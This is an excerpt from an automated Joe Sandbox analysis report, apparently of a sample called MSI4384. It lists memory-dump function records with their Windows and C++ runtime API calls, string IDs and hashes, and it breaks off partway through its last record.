                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Mpunct$GetvalsH_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 2204710431-1686923651
                                                                    • Opcode ID: bd648d251b6cb647d5147228bfa42042242e4844a33b5ed83b629187698d16c5
                                                                    • Instruction ID: 34238db80c7f7ba61b8a6654e7dd9436b85daacd4455c753d4c5bc3d0d9932e8
                                                                    • Opcode Fuzzy Hash: bd648d251b6cb647d5147228bfa42042242e4844a33b5ed83b629187698d16c5
                                                                    • Instruction Fuzzy Hash: F521D0B1900B56AEDB25DF76884076BBFF8AB0C304F04491FE498C7A82D778E605CB94
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(F3E52339,F3E52339,?,?,00000000,0046BF91,000000FF), ref: 004286BB
                                                                      • Part of subcall function 004495A8: AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07), ref: 004495B3
                                                                      • Part of subcall function 004495A8: ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,00422646,00484714,F3E52339,?,?,0046B16D,000000FF,?,00421A07,?,?,?,F3E52339), ref: 004495ED
                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00428680
                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00428687
                                                                      • Part of subcall function 00449557: AcquireSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449561
                                                                      • Part of subcall function 00449557: ReleaseSRWLockExclusive.KERNEL32(00483B74,?,?,004226B7,00484714,0046EC90), ref: 00449594
                                                                      • Part of subcall function 00449557: WakeAllConditionVariable.KERNEL32(00483B70,?,?,004226B7,00484714,0046EC90), ref: 0044959F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: ExclusiveLock$AcquireRelease$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                    • String ID: IsWow64Process$kernel32
                                                                    • API String ID: 411948497-3789238822
                                                                    • Opcode ID: 4af76f13d7b880c61500b5a064845bd886073dd02900a7a88b524ae956f285d4
                                                                    • Instruction ID: 5a38b0d1313d0151eb3c7e320f4df08aabff2a8812dbbb094d57e0af83caedd6
                                                                    • Opcode Fuzzy Hash: 4af76f13d7b880c61500b5a064845bd886073dd02900a7a88b524ae956f285d4
                                                                    • Instruction Fuzzy Hash: 5521AE72A05615EFDB10CFA4ED05B9EB7B8E749720F50067FE81193390EB79A900CB99
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043404E
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00434058
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 004340A9
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004340C9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: 8H
                                                                    • API String ID: 2854358121-2343166405
                                                                    • Opcode ID: a8ad2bab92e8df886482ccd8936c24c5ef9ddec80c556d025818f55b47407cf9
                                                                    • Instruction ID: 559f49102767833e01396850a7a2d8aba01ba5338e18c6badaf691855ea052d1
                                                                    • Opcode Fuzzy Hash: a8ad2bab92e8df886482ccd8936c24c5ef9ddec80c556d025818f55b47407cf9
                                                                    • Instruction Fuzzy Hash: 77010431E001169BCB08FFA5D8416AE77B5AF88718F24441FF5106B391DF789E048B89
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043B073
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043B07D
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043B0CE
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043B0EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: \:H
                                                                    • API String ID: 2854358121-3343456541
                                                                    • Opcode ID: a13c6643c038d82ebea3a6480f4cb2f49860e6b9100bf96da10e4be4fb6c4393
                                                                    • Instruction ID: ee2324c2f96be39e41c16ba4772fbe1527e69a9766b1e17bb6ac9a5c52c9de11
                                                                    • Opcode Fuzzy Hash: a13c6643c038d82ebea3a6480f4cb2f49860e6b9100bf96da10e4be4fb6c4393
                                                                    • Instruction Fuzzy Hash: 88010431900115ABCB08EFA5D8956AF7775AF48718F20441EE520673C1DF788A048BC9
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0044515E
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00445168
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 004451B9
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004451D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: :H
                                                                    • API String ID: 2854358121-3114238791
                                                                    • Opcode ID: cacd985c1a8c34cec7f1d8209963c3c84415efd47c1529273c7e0204370fad9e
                                                                    • Instruction ID: 48473a18cef7e6d1fb9316857a3dee905d62e12f5ea9ad571d21a38da177b155
                                                                    • Opcode Fuzzy Hash: cacd985c1a8c34cec7f1d8209963c3c84415efd47c1529273c7e0204370fad9e
                                                                    • Instruction Fuzzy Hash: 6D01ED31D005259BDF04FFA59855AAEB771AF84718F20442EE410AB382DF789E04CB89
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00445288
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00445292
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 004452E3
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00445303
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: :H
                                                                    • API String ID: 2854358121-3114238791
                                                                    • Opcode ID: d23cdef8c791a337078e29a81d93e62c7baaee45b8203188dd2e86fcd5b98366
                                                                    • Instruction ID: 726416c6c452cc4d18023c0ac580fb844e031b4c8a0e61a3f603beb8b9b1e1c9
                                                                    • Opcode Fuzzy Hash: d23cdef8c791a337078e29a81d93e62c7baaee45b8203188dd2e86fcd5b98366
                                                                    • Instruction Fuzzy Hash: D10104319001259BDF04FFA5D8516AE7761AF44718F60441FE8106B3D2DF7C9E04CB89
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A5F9
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A603
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A654
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A674
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: l:H
                                                                    • API String ID: 2854358121-3810720909
                                                                    • Opcode ID: 96c268ab4ae47bf143a321f37df6e069e01f818c5455a38e57b983ca8ef4a82f
                                                                    • Instruction ID: 4ad3a71f87091da1bfc462cf99ab6d6474fd22ee739bf224fb7c7885a13049a4
                                                                    • Opcode Fuzzy Hash: 96c268ab4ae47bf143a321f37df6e069e01f818c5455a38e57b983ca8ef4a82f
                                                                    • Instruction Fuzzy Hash: 4B0144319001159BCB08FFA5D8526AE7764BF88718F18001FE441A73D1DF3C8A018BCA
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A68E
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A698
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A6E9
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A709
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: D:H
                                                                    • API String ID: 2854358121-3581733845
                                                                    • Opcode ID: 57999039d69a764d2a64963d3fb662358605574463dc4c862ab426b07494fed5
                                                                    • Instruction ID: 00f94eed9016229caeb47af2b47c28f5a91776ebb40141501b9f8925307539e5
                                                                    • Opcode Fuzzy Hash: 57999039d69a764d2a64963d3fb662358605574463dc4c862ab426b07494fed5
                                                                    • Instruction Fuzzy Hash: 9C01043190011A9BCB05EFA5D8956AE7771BF48718F15441EE4516B391DF7C8E048B8A
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AD8A
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AD94
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043ADE5
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AE05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: `:H
                                                                    • API String ID: 2854358121-3929540073
                                                                    • Opcode ID: 00ed16011bec27d92f419315d474be231d385d3b3073496bf5bf17b3803072db
                                                                    • Instruction ID: 3414fa6942ea93f478ef99ba6f29e4e9cbd954cd897745f67dad5c6ef4dfc541
                                                                    • Opcode Fuzzy Hash: 00ed16011bec27d92f419315d474be231d385d3b3073496bf5bf17b3803072db
                                                                    • Instruction Fuzzy Hash: D60104319401259BCB08EFA5D856AAE7761AF88718F14441EE55167381DF788E048BCA
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AE1F
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AE29
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043AE7A
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AE9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: @:H
                                                                    • API String ID: 2854358121-3530900233
                                                                    • Opcode ID: 2c3e297458951211d611193e9e8c84f0f5e84452bdbc0255f8319965db9e1959
                                                                    • Instruction ID: 747a2199115846a8716355940533813b5eda791dea68b3b2515832e6ffef53e4
                                                                    • Opcode Fuzzy Hash: 2c3e297458951211d611193e9e8c84f0f5e84452bdbc0255f8319965db9e1959
                                                                    • Instruction Fuzzy Hash: CA0104319401259BCB05FFA5D8566BEB761AF88718F14441FE450AB391DF7C8E049B8A
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AEB4
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AEBE
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043AF0F
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AF2F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: d:H
                                                                    • API String ID: 2854358121-3979455797
                                                                    • Opcode ID: cf4b9cfe282717ba272f46e793d04e807d85a7ac4f0ac13cf5a18f26fd6f1578
                                                                    • Instruction ID: 3651cbdb4aaf36b73a50bce3dae20a38b63534f3580f28e64fd0c4a07dd499e7
                                                                    • Opcode Fuzzy Hash: cf4b9cfe282717ba272f46e793d04e807d85a7ac4f0ac13cf5a18f26fd6f1578
                                                                    • Instruction Fuzzy Hash: 44012675A001159BCB04FFA5D8556AE7765AF88718F25041FF450A73C1DF7C8E058B8E
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F3E52339,?,?,00000001,0046D620,000000FF,?,0045A61D,?,?,0045A5F4,?,?), ref: 0045A65D
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0045A66F
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001,0046D620,000000FF,?,0045A61D,?,?,0045A5F4,?,?), ref: 0045A691
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 5b451e1eed8cc319f61dc5ecd65c45329ee9e38e1817b6e546b16a4be376f70e
                                                                    • Instruction ID: d71e901e9314d492d80ae2fb437310b8c5d32df6d4429465a5ab07ba4ebafe67
                                                                    • Opcode Fuzzy Hash: 5b451e1eed8cc319f61dc5ecd65c45329ee9e38e1817b6e546b16a4be376f70e
                                                                    • Instruction Fuzzy Hash: 3301A731944615EFCB118F80DC05FEEBBF8FB04751F040636F851A2290EBB99904CA49
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0045F064,?,?,?,?,?,0045F188,0000001A,AppPolicyGetProcessTerminationMethod,00474848,AppPolicyGetProcessTerminationMethod,?), ref: 0045F109
                                                                    • GetLastError.KERNEL32(?,0045F064,?,?,?,?,?,0045F188,0000001A,AppPolicyGetProcessTerminationMethod,00474848,AppPolicyGetProcessTerminationMethod,?,?,0046167E,00000000), ref: 0045F113
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0045F151
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3177248105-537541572
                                                                    • Opcode ID: 8dde708775c775824b0af4bcb6f9d5add4dca741faf66494c4e23f5b601d9c02
                                                                    • Instruction ID: ea93ed2220634e25255537958449e233674621ddfaf14134995d1ad82fa97795
                                                                    • Opcode Fuzzy Hash: 8dde708775c775824b0af4bcb6f9d5add4dca741faf66494c4e23f5b601d9c02
                                                                    • Instruction Fuzzy Hash: 75F08230640204F6DF211A61ED06F593F569B01B52F644032FD4CE42E2E7A9FD5C998E
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A7B8
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A7C2
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • messages.LIBCPMT ref: 0043A7FC
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A833
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
                                                                    • String ID: p:H
                                                                    • API String ID: 50917705-4129203865
                                                                    • Opcode ID: df03c2ad19f7674bb8e0ea5e6cf22ba8c82e958105c33273d87ce5fc4a00ab1f
                                                                    • Instruction ID: 2d999c8a5d62a9d28f5c3ef17a039e35f7387758ea061b8c58cd380dedc8f010
                                                                    • Opcode Fuzzy Hash: df03c2ad19f7674bb8e0ea5e6cf22ba8c82e958105c33273d87ce5fc4a00ab1f
                                                                    • Instruction Fuzzy Hash: 3EF096319401165BDB09FFA1C8966BE2334AF54B19F50441EF5506B2D1EF3C8A15879E
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A84D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A857
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • messages.LIBCPMT ref: 0043A891
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A8C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
                                                                    • String ID: H:H
                                                                    • API String ID: 50917705-3697676977
                                                                    • Opcode ID: 98ba5f8d063f93a7231b48c5fb964e294a8d606694a491408bb5b15178e86708
                                                                    • Instruction ID: 3a05afa95ad2f9531a10a1ad7de6d8592aa6089e8e0e44c9673a70ad2b9a5ab5
                                                                    • Opcode Fuzzy Hash: 98ba5f8d063f93a7231b48c5fb964e294a8d606694a491408bb5b15178e86708
                                                                    • Instruction Fuzzy Hash: 45F0F03194011A9ADB0CFFA1C852BAE7324AF04B1DF50041FF5106B2C1DF3C8A058BCA
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 0045EA1F
                                                                    • __alloca_probe_16.LIBCMT ref: 0045EAE8
                                                                    • __freea.LIBCMT ref: 0045EB4F
                                                                      • Part of subcall function 0045D330: HeapAlloc.KERNEL32(00000000,?,?,?,0045CD65,?,00000000,?,0044E0E9,?,?,?,?,?,?,0042163C), ref: 0045D365
                                                                    • __freea.LIBCMT ref: 0045EB62
                                                                    • __freea.LIBCMT ref: 0045EB6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 1096550386-0
                                                                    • Opcode ID: 62b98d2ce3533249c67303d12fcc67212e2fd03b269f00e16ba9abe05989b61d
                                                                    • Instruction ID: 2dfbeef67e81b9eda89e0919af1773002bcad98b869fb2de0b33d3d06f69f41a
